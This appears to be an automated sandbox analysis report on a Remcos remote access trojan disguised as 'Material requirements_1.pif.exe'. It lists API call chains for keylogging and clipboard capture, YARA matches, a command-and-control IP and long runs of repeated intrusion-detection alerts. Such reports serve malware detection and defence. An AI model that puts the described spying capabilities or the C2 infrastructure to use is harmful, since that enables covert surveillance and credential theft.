                Source: Material requirements_1.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: VpNo.pdbSHA256+ source: Material requirements_1.pif.exe
                Source: Binary string: VpNo.pdb source: Material requirements_1.pif.exe
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040B335
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,7_2_0041B43F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040B53A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0044D5F9 FindFirstFileExA,7_2_0044D5F9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,7_2_004089A9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00406AC2 FindFirstFileW,FindNextFileW,7_2_00406AC2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,7_2_00407A8C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00418C79
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,7_2_00408DA7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00406F06

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49711 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49709 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49714 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49713 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49717 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49754 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49715 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49772 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49838 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49806 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49736 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49866 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49882 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49898 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49853 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49823 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49787 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49911 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49945 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49960 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49975 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49925 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49992 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50005 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50006 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50009 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50011 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50008 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50015 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50016 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50012 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50014 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50013 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50010 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50018 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50022 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50023 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50024 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50020 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50026 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50021 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50028 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50031 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50034 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50033 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50032 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50038 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50007 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50030 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50044 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50036 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50043 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50027 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50048 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50059 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50019 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50046 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50037 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50051 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50049 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50040 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50062 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50058 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50056 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50064 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50075 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50072 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50086 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50081 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50067 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50061 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50077 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50045 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50080 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50063 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50071 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50070 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50054 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50052 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50083 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50029 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50065 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50073 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50085 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50041 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50042 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50047 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50035 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50079 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50078 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50066 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50074 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50039 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50050 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50068 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50087 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50053 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50057 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50055 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50089 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50090 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50092 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50091 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50084 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50088 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50069 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50025 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50082 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50004 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50076 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50093 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50017 -> 87.120.116.245:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50060 -> 87.120.116.245:2404
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 87.120.116.245
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 87.120.116.245:2404
                Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.245
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00426107 recv,7_2_00426107
                Source: Material requirements_1.pif.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Material requirements_1.pif.exe, 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: Material requirements_1.pif.exe, 00000000.00000002.2084001859.0000000002E39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000007_2_004099E4
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004159C6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004159C6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004159C6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_00409B10
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041BB87 SystemParametersInfoW,7_2_0041BB87

